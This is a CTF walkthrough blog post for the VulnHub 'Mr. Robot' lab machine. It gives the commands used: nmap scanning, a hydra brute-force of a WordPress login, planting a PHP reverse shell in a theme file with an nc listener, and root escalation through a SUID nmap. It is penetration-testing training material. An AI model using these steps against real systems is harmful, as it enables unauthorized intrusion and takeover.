Introduction
The Mr. Robot machine on VulnHub is inspired by the popular TV series Mr. Robot. It presents a realistic pentesting scenario that tests enumeration, web exploitation, privilege escalation, and password cracking. This blog post will guide you through exploiting the machine step by step, covering all the techniques used to gain full system access.
💀 "Hello, friend. If you’re reading this, you’re about to hack into a system inspired by fsociety. Let’s embrace the chaos." 💀
1. Setting Up the Lab
Prerequisites:
- A Kali Linux or Parrot OS machine
- VirtualBox/VMware with the Mr. Robot machine imported
- netdiscover or nmap for network scanning
- gobuster or dirb for directory enumeration
- hydra or john for password cracking
Finding the Target IP
Since VulnHub machines obtain their address via DHCP, we first need to discover the target's IP:
netdiscover -r 192.168.1.0/24 # Adjust for your subnet
Alternatively, use Nmap:
nmap -sn 192.168.1.0/24
Once the machine’s IP is identified, we proceed with scanning. It’s time to make some digital noise... quietly. 😈
2. Network Scanning and Enumeration
Running an Nmap Scan
nmap -sC -sV -p- <Target-IP>
Key Findings:
- Port 80 (HTTP) is open
- No SSH or other critical services
This indicates the attack surface is likely a web application. Looks like our playground is the web. Let’s make it dance. 😈
3. Web Enumeration & Exploitation
Exploring the Website
Navigating to http://<Target-IP> reveals a Mr. Robot-themed webpage.
Checking the robots.txt file:
curl http://<Target-IP>/robots.txt
Findings:
- The file lists fsocity.dic (a wordlist) and key-1-of-3.txt
Extracting the Wordlist
wget http://<Target-IP>/fsocity.dic
This will be useful for brute-forcing login credentials. Who leaves a wordlist on a public server? Rookie mistake... 😏
Directory Enumeration
Using Gobuster:
gobuster dir -u http://<Target-IP> -w /usr/share/wordlists/dirb/common.txt
Findings:
- /wp-login.php suggests a WordPress installation.
- /wp-admin/ confirms it’s an active admin panel.
4. Exploiting WordPress
Brute-Forcing WordPress Login
Using the discovered wordlist (fsocity.dic):
hydra -L fsocity.dic -p password http://<Target-IP>/wp-login.php
After some attempts, we find valid credentials:
Username: elliot
Password: ER28-0652
Gaining Access to WordPress Dashboard
Logging in at http://<Target-IP>/wp-login.php, we find we have admin access.
Exploiting WordPress via Reverse Shell
We can upload a malicious PHP reverse shell by editing the theme files:
- Navigate to Appearance > Theme Editor
- Modify 404.php with a PHP reverse shell (e.g., from /usr/share/webshells/php/php-reverse-shell.php)
- Set up a listener:
nc -lvnp 4444
- Trigger the shell by visiting http://<Target-IP>/wp-content/themes/twentytwentyone/404.php
Now we have a low-privilege shell as the www-data user. From here, we rise like a cyber phoenix... 🔥
5. Privilege Escalation
Finding the Second Key
Navigating to /home/robot/ shows key-2-of-3.txt, but we lack permissions to read it.
Checking User Credentials
The robot user has a .bash_history file containing:
su robot
password: abcdefghijklmnopqrstuvwxyz
Switching users:
su robot
Now we can read the second key:
cat /home/robot/key-2-of-3.txt
Privilege Escalation to Root
Checking SUID binaries:
find / -perm -4000 2>/dev/null
The list includes nmap with the SUID bit set. Its interactive mode can spawn a shell, which then runs with root privileges:
nmap --interactive
nmap> !sh
Now we have root access! Congratulations, you just became the boss of this machine. 👑
whoami
root
cat /root/key-3-of-3.txt
Conclusion
The Mr. Robot VulnHub machine is an excellent beginner-to-intermediate CTF that tests real-world pentesting techniques, including:
- Web enumeration & brute-forcing
- WordPress exploitation
- Reverse shell deployment
- Privilege escalation via misconfigured binaries
By following this methodology, you can approach similar CTFs with a structured attack plan.
🚀 Next Steps:
- Try more VulnHub machines for practice.
- Explore custom exploits beyond the standard tools.
- Automate parts of the attack with scripts.
💾 Remember, every exploit is a lesson, and every system is a puzzle. Keep hacking, stay ethical, and own your skills like a true digital ghost. 👻